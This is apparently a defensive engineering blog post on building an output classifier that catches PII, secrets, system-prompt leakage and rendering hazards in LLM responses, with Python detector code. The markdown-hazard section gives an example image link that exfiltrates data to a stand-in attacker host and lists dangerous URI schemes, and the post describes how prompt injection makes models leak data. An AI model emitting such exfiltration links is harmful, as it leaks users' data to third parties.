Output Classification: A PII and Secrets Detector for LLM Apps

The input side of LLM security gets all the attention. Input is the obvious attack surface; the output side feels like a downstream concern. In practice, output classification is where you catch the things your input filter missed — leaked system prompts, exfiltrated PII, emitted secrets, malicious payloads heading to a downstream renderer. Skipping it leaves the heaviest gaps unguarded. It is the output-rail half of the LLM guardrails stack; this post is the build guide for it.

This is the production-grade approach we’ve shipped at multiple defenders.

What an output classifier actually checks

A useful output classifier runs every model response through a sequence of detectors. Each detector is independent, returns a verdict + confidence, and never exceeds 50ms p99 latency on its own.

The base detectors:

PII detection — names, emails, phone numbers, addresses, government IDs, payment cards, health info
Secrets detection — API keys, tokens, private keys, passwords, internal hostnames
System prompt leakage — substring overlap between output and the system prompt
Injected instruction echo — output that contains imperative-mood directives at unusual density (signs the model is forwarding an injected payload)
Markdown/HTML rendering hazards — output contains JS URIs, off-domain links, encoded HTML
Off-policy content — falling outside the application’s allowed domain (e.g. a customer-support bot answering medical questions)

In production, you typically get the first three for free with off-the-shelf libraries. The last three require app-specific rules. Toxicity and policy-category scoring is a related but separate job — see our content moderation tools guide for that surface.
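The rendering-hazard detector is listed above but never built in this post, so here is a minimal sketch of one. It assumes a hypothetical host allow-list (`ALLOWED_HOSTS`) and a small set of dangerous URI schemes and encoded tags; real renderers have more edge cases, so treat this as a starting point rather than a complete sanitizer.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: replace with the hosts your app legitimately links to.
ALLOWED_HOSTS = frozenset({"example.com", "docs.example.com"})

# Markdown links/images ([text](url), ![alt](url)) and bare http(s) URLs.
_MD_LINK = re.compile(r"!?\[[^\]]*\]\(\s*<?([^)\s>]+)")
_BARE_URL = re.compile(r"https?://[^\s)>\"']+", re.IGNORECASE)
_DANGEROUS_SCHEMES = ("javascript:", "data:", "vbscript:")
# Entity-encoded "<" followed by a risky tag, or a numeric-encoded "<".
_ENCODED_TAG = re.compile(
    r"&lt;\s*(?:script|iframe|img|svg)|&#(?:x0*3c|0*60);?", re.IGNORECASE
)


def markdown_hazards(output: str, allowed_hosts=ALLOWED_HOSTS) -> list[str]:
    """Return a sorted list of hazard labels found in a model response."""
    hazards = set()
    urls = set(_MD_LINK.findall(output)) | set(_BARE_URL.findall(output))
    for url in urls:
        lowered = url.strip().lower()
        if lowered.startswith(_DANGEROUS_SCHEMES):
            hazards.add("dangerous-scheme:" + lowered.split(":", 1)[0])
            continue
        host = urlparse(url).hostname
        if host and host not in allowed_hosts:
            hazards.add("off-domain:" + host)
    if _ENCODED_TAG.search(output):
        hazards.add("encoded-html")
    return sorted(hazards)
```

Off-domain image links matter most here: a rendered `![x](https://attacker.example/?d=...)` can exfiltrate data through the query string without the user clicking anything.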

Building the PII detector

Microsoft Presidio is the most-used open-source option. It ships ~30 entity types, integrates with spaCy or Transformers backends, and is fast enough for production.

The trap is that Presidio’s defaults flag aggressively. Out of the box, you’ll get false positives on:

Random alphanumeric strings the regex thinks are credit cards
Common first names embedded in unrelated content
Hex strings that look like IBANs

Tune the recognizers per your domain. For most LLM apps:

from presidio_analyzer import AnalyzerEngine, RecognizerRegistry
from presidio_analyzer.predefined_recognizers import (
    CreditCardRecognizer, EmailRecognizer, PhoneRecognizer,
)

registry = RecognizerRegistry()
# Only the recognizers your domain actually needs
registry.add_recognizer(EmailRecognizer())
registry.add_recognizer(PhoneRecognizer(supported_regions=["US", "GB"]))
registry.add_recognizer(CreditCardRecognizer())
analyzer = AnalyzerEngine(registry=registry)

# `output` is the model response text being classified
results = analyzer.analyze(text=output, language="en")
# Keep (entity type, confidence, matched text) for results above the threshold
flagged = [(r.entity_type, r.score, output[r.start:r.end]) for r in results if r.score > 0.85]

The threshold is a precision/recall dial on Presidio’s per-entity confidence score: a lower threshold (around 0.7) catches more borderline matches at the cost of more false positives, while a higher threshold (around 0.85) trims false positives but lets some lower-confidence true PII through. There is no universally correct value: calibrate it against your own labeled outputs, and set it per entity type if your false-positive tolerance differs across, say, credit-card numbers versus names.
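A per-entity threshold can be sketched as a small lookup applied to the analyzer results. The threshold values below are placeholders, not recommendations, and `Result` is a stand-in with the same `entity_type`, `start`, `end`, and `score` attributes as Presidio's result objects so the sketch runs without Presidio installed. Pattern-based recognizers can return fairly low base scores, so check what your Presidio version actually emits before settling on a single global cutoff.

```python
from collections import namedtuple

# Hypothetical per-entity thresholds: calibrate on your own labeled outputs.
THRESHOLDS = {"CREDIT_CARD": 0.9, "EMAIL_ADDRESS": 0.85, "PHONE_NUMBER": 0.4}
DEFAULT_THRESHOLD = 0.85


def flag_pii(text, results, thresholds=THRESHOLDS, default=DEFAULT_THRESHOLD):
    """Keep results whose score meets the threshold for their entity type."""
    flagged = []
    for r in results:
        if r.score >= thresholds.get(r.entity_type, default):
            flagged.append((r.entity_type, r.score, text[r.start:r.end]))
    return flagged


# Stand-in for Presidio's result objects (same attribute names).
Result = namedtuple("Result", "entity_type start end score")

text = "Call 212-555-0100 or mail a@b.co"
results = [
    Result("PHONE_NUMBER", 5, 17, 0.4),
    Result("EMAIL_ADDRESS", 26, 32, 1.0),
]
print(flag_pii(text, results))
```

With a single 0.85 cutoff the phone number in this example would be dropped; the per-entity table keeps it while still holding other entity types to a stricter bar.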

Building the secrets detector

Don’t roll your own regex. TruffleHog maintains one of the most comprehensive sets of secret-detection rules: 800+ patterns across cloud providers, SaaS APIs, and internal services. Where possible, the engine validates suspected secrets against the actual provider’s API, which removes most false positives for the findings it can verify.

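TruffleHog ships as a Go binary rather than a Python library (the trufflehog3 package on PyPI is a separate project), so from Python, run the CLI against the response text and parse its JSON output:

import json, subprocess, tempfile
with tempfile.NamedTemporaryFile("w", suffix=".txt") as f:  # scan the response via a temp file
    f.write(output); f.flush()
    proc = subprocess.run(["trufflehog", "filesystem", f.name, "--json", "--no-update"], capture_output=True, text=True)
results = [json.loads(line) for line in proc.stdout.splitlines() if line.startswith("{")]
verified_hits = [r for r in results if r.get("Verified") is True]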

If Verified is True, the string was confirmed as a live secret by calling the issuing service. Block the output unconditionally.

If Verified is False but a high-confidence pattern matched, you have a likely secret that wasn’t validatable (revoked, custom-issued, or rate-limited). Default to block in production; allow override for trusted internal flows.
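The two rules above can be written as one small policy function. This is a sketch under assumptions: `findings` is a list of parsed result dicts carrying a `Verified` key, every unverified finding is treated as a high-confidence pattern match, and the hypothetical `trusted_internal` flag downgrades an unverified hit to a warning instead of a block.

```python
def secrets_action(findings, trusted_internal=False):
    """Map secret-scanner findings to 'block', 'warn', or 'pass'."""
    # A verified live secret is blocked unconditionally, even for trusted flows.
    if any(f.get("Verified") is True for f in findings):
        return "block"
    # Unverified pattern match: block by default, warn for trusted internal flows.
    if findings:
        return "warn" if trusted_internal else "block"
    return "pass"
```

Keeping the override out of the verified branch is deliberate: a trusted flow should never be able to release a secret that is known to be live.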

System prompt leakage

This is the detector most teams skip and most attacks exploit. Compute a rolling-hash representation of the system prompt at request time. After generating the response, scan for substring matches at length ≥ 40 characters.

def system_prompt_overlap(output: str, system_prompt: str, min_len: int = 40) -> bool:
    # Flag if any min_len-character window of the system prompt appears verbatim in the output
    # Production version uses suffix automaton; this is the simple form
    # Prompts shorter than min_len produce no windows and are never flagged
    for i in range(len(system_prompt) - min_len + 1):  # +1 so the final window is checked
        chunk = system_prompt[i:i + min_len]
        if chunk in output:
            return True
    return False

40 characters is short enough to catch leakage of meaningful instructions and long enough to avoid false positives on common phrases. Tune to your prompt length.
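One way to precompute the system prompt representation once and reuse it across responses is sketched below. It is neither a true rolling hash nor a suffix automaton: it stores every `min_len`-character window of the prompt in a set and relies on Python's built-in string hashing. The whitespace and case normalization is an added assumption, meant to catch trivially reformatted leaks.

```python
import re


def normalize(text: str) -> str:
    """Collapse whitespace and case so trivial reformatting does not hide a leak."""
    return re.sub(r"\s+", " ", text).strip().casefold()


def build_window_index(system_prompt: str, min_len: int = 40) -> frozenset:
    """Precompute every min_len-character window of the normalized prompt."""
    p = normalize(system_prompt)
    return frozenset(p[i:i + min_len] for i in range(len(p) - min_len + 1))


def leaks_system_prompt(output: str, index: frozenset, min_len: int = 40) -> bool:
    """True if any min_len-character window of the output is in the prompt index."""
    o = normalize(output)
    return any(o[i:i + min_len] in index for i in range(len(o) - min_len + 1))
```

Build the index once per system prompt and pass the same `min_len` to both functions. A prompt shorter than `min_len` yields an empty index and will never be flagged, so lower `min_len` for short prompts.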

When this fires, the response is blocked AND the session is marked compromised — assume the attacker can reproduce and exfiltrate further. Log the request_id for retro analysis.

Off-policy content

The hardest detector to build because “off-policy” is application-specific. The most reliable approach we’ve found:

Define the application’s allowed topic surface as a fixed set of phrases (10-50 entries; the customer-support bot’s “what we sell,” “shipping policies,” “returns process,” etc.)
Compute embedding similarity between the output and each allowed phrase
Take the max similarity. If below threshold, the output drifted off-policy.

This catches:

A coding assistant answering legal questions
A customer-support bot weighing in on geopolitics
A medical-info bot opining on stock picks

The threshold is empirical (typically 0.4-0.6 with sentence-transformers/all-mpnet-base-v2) and needs domain tuning.
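The three steps above can be sketched with a pluggable embedding function. Everything named here is illustrative: `embed` is any callable that maps text to a vector (in production it would wrap a sentence-embedding model), `toy_embed` is a bag-of-words stand-in so the example runs without downloading a model, and the 0.5 threshold is a placeholder.

```python
import math


def cosine(a, b) -> float:
    """Cosine similarity of two equal-length vectors; 0.0 if either is all zeros."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def off_policy(output, allowed_phrases, embed, threshold=0.5):
    """Return (is_off_policy, best_similarity) against the allowed topic phrases."""
    out_vec = embed(output)
    best = max((cosine(out_vec, embed(p)) for p in allowed_phrases), default=0.0)
    return best < threshold, best


# Toy embedding for demonstration only: word counts over a tiny fixed vocabulary.
VOCAB = ["shipping", "returns", "refund", "order", "stock", "election"]


def toy_embed(text: str):
    words = text.lower().split()
    return [float(words.count(w)) for w in VOCAB]


allowed = ["shipping order", "returns refund"]
print(off_policy("your refund for returns", allowed, toy_embed))
print(off_policy("the election and stock picks", allowed, toy_embed))
```

In a real deployment the allowed-phrase embeddings would be computed once at startup rather than on every call, since they never change between requests.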

Output composition: pipeline structure

def classify_output(output: str, ctx: dict) -> Verdict:
    checks = [
        pii_check(output),
        secrets_check(output),
        system_prompt_leak_check(output, ctx["system_prompt"]),
        markdown_hazard_check(output),
        off_policy_check(output, ctx["allowed_topics"]),
    ]
    # Any block-severity match → block
    if any(c.severity == "block" for c in checks):
        return Verdict.block(reasons=[c for c in checks if c.severity == "block"])
    # Any warn → log + alert + pass
    if any(c.severity == "warn" for c in checks):
        return Verdict.warn(reasons=[c for c in checks if c.severity == "warn"])
    return Verdict.pass_()

In production, run this as a sidecar to the LLM call, not inline. Latency budget for the full pipeline should be ≤100ms p95. If you exceed that, the LLM call’s UX degrades noticeably.
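The pipeline above relies on a per-check result with a `severity` field and a `Verdict` type that the post does not define. A minimal sketch of both follows; the field names beyond `severity` are assumptions, and `aggregate` is a hypothetical helper that mirrors the block-then-warn-then-pass ordering.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class CheckResult:
    detector: str            # e.g. "pii", "secrets"
    severity: str            # "pass", "warn", or "block"
    confidence: float = 0.0
    detail: str = ""


@dataclass(frozen=True)
class Verdict:
    action: str              # "pass", "warn", or "block"
    reasons: tuple = ()

    @classmethod
    def block(cls, reasons):
        return cls("block", tuple(reasons))

    @classmethod
    def warn(cls, reasons):
        return cls("warn", tuple(reasons))

    @classmethod
    def pass_(cls):
        return cls("pass")


def aggregate(checks) -> Verdict:
    """Block wins over warn, warn wins over pass."""
    for level in ("block", "warn"):
        hits = [c for c in checks if c.severity == level]
        if hits:
            return Verdict(level, tuple(hits))
    return Verdict.pass_()
```

Frozen dataclasses keep verdicts immutable once issued, which makes them safe to pass straight to logging and alerting code.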

What to log

Every classification decision emits a structured event with:

request_id, session_id, user_id
The detectors that fired (entity types, severity, confidence)
The truncated matched span (max 50 chars; never the full secret/PII)
The action taken (block, warn, pass)

This is the audit trail when you need to investigate a leakage incident or tune detectors. It’s also the data you train on to improve recall.
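Truncating a matched span to 50 characters is not enough on its own, because a card number or a short API key fits entirely inside that limit. One option is to mask the span before it reaches the log. The sketch below assumes a hypothetical event shape and keeps only the first four characters of longer matches; adjust `keep` to your own policy.

```python
import json


def mask_span(span: str, keep: int = 4, max_len: int = 50) -> str:
    """Show at most `keep` leading characters, mask the rest, cap total length."""
    # Short spans are masked entirely so the visible prefix never dominates.
    visible = span[:keep] if len(span) > keep * 2 else ""
    masked = visible + "*" * (len(span) - len(visible))
    return masked[:max_len]


def build_event(request_id, session_id, user_id, action, detections) -> str:
    """Serialize one classification decision as a structured JSON log line."""
    return json.dumps({
        "request_id": request_id,
        "session_id": session_id,
        "user_id": user_id,
        "action": action,  # "block", "warn", or "pass"
        "detections": [
            {
                "detector": d["detector"],
                "entity_type": d["entity_type"],
                "severity": d["severity"],
                "confidence": d["confidence"],
                "span": mask_span(d["span"]),
            }
            for d in detections
        ],
    })
```

The raw span never appears in the serialized event, so the log line is safe to ship to the normal logging pipeline.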

What to NOT do

Don’t show the user what was redacted. “We blocked ‘4111-1111-1111-1111’ from your response” tells the attacker exactly what triggered the filter. Show a generic message.
Don’t store full responses with detected PII in normal logs. That’s a recursive privacy problem. Redact at log time.
Don’t trust the LLM to self-classify. “Ask GPT if this output contains PII” sounds clever, but adversarial inputs that bypass the production model can also bypass the judge model.
Don’t fail open on classifier errors. If the detector throws an exception, default to block. Production stability requires this.
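Failing closed can be enforced with a thin wrapper around each detector call. This is a sketch: `CheckResult` is a hypothetical result type with a `severity` field, and `fail_closed` is an illustrative helper name.

```python
import logging
from dataclasses import dataclass

logger = logging.getLogger("output_classifier")


@dataclass(frozen=True)
class CheckResult:
    detector: str
    severity: str   # "pass", "warn", or "block"
    detail: str = ""


def fail_closed(name, detector, *args, **kwargs) -> CheckResult:
    """Run a detector; if it raises, log the error and return a block result."""
    try:
        return detector(*args, **kwargs)
    except Exception:
        # Log the traceback for debugging, but never let the response through.
        logger.exception("detector %s failed; failing closed", name)
        return CheckResult(name, "block", "detector error")
```

Wrapping each detector separately, rather than the whole pipeline, keeps the log entry specific about which detector broke.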

Cross-mapping

In the OWASP Top 10 for LLM Applications (2025 edition), this pipeline addresses LLM05 (Improper Output Handling, called LLM02 Insecure Output Handling in the 2023 list) and parts of LLM02 (Sensitive Information Disclosure) and LLM07 (System Prompt Leakage). For the input side and the architectural concerns, see our LLM guardrails overview and the detection engineering runbook on the sister site.

The output filter is not the most fun part of LLM security to build, but it catches the highest-impact class of failures. Build it before you build anything else.

This post is part of the LLM Guardrails Hub, the complete index of defensive AI engineering resources on GuardML.
